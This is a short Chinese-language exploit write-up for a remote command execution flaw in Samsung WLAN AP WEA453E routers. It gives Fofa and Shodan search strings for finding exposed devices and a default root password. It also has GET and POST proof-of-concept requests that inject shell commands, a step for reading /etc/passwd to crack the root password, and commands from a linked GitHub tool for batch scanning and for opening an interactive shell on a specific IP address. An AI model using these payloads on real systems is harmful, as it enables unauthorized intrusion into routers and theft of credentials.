SamSung WLAN AP:RCE
一:漏洞信息
三星WLAN AP WEA453E路由器远程命令执行…
二:漏洞复现Fofa语法:
Fofa语法:
title=="Samsung WLAN AP"
Shodan语法
title:"Samsung WLAN AP"
默认密码:
username:root
password:sweap12~
手工利用
步骤一:以下为GET请求POC...
http://xx.xx.xx.xx/(download)/tmp/a.txt?command1=shell:ifconfig|%20dd%20of=/tmp/a.txt
步骤二:以下为POST请求的POC…
POST /(download)/tmp/a.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
command1=shell:ifconfig| dd of=/tmp/a.txt
步骤三:读取/etc/passwd文件,可以查看登录root用户的加密密码进行解密…也可用默认密码登录…
http://xx.xx.xx.xx/(download)/tmp/a.txt?command1=shell:cat /etc/passwd|%20dd%20of=/tmp/a.txt
批量利用
步骤一:项目下载地址…
https://github.com/msfisgood/Samsung-WLAN_RCE
步骤二:进行批量漏洞检测…
python3 Check.py ip.txt
步骤三:针对单个漏洞目标获取交互式命令接口…
python3 "Samsung WLAN_RCE.py" 175.215.117.17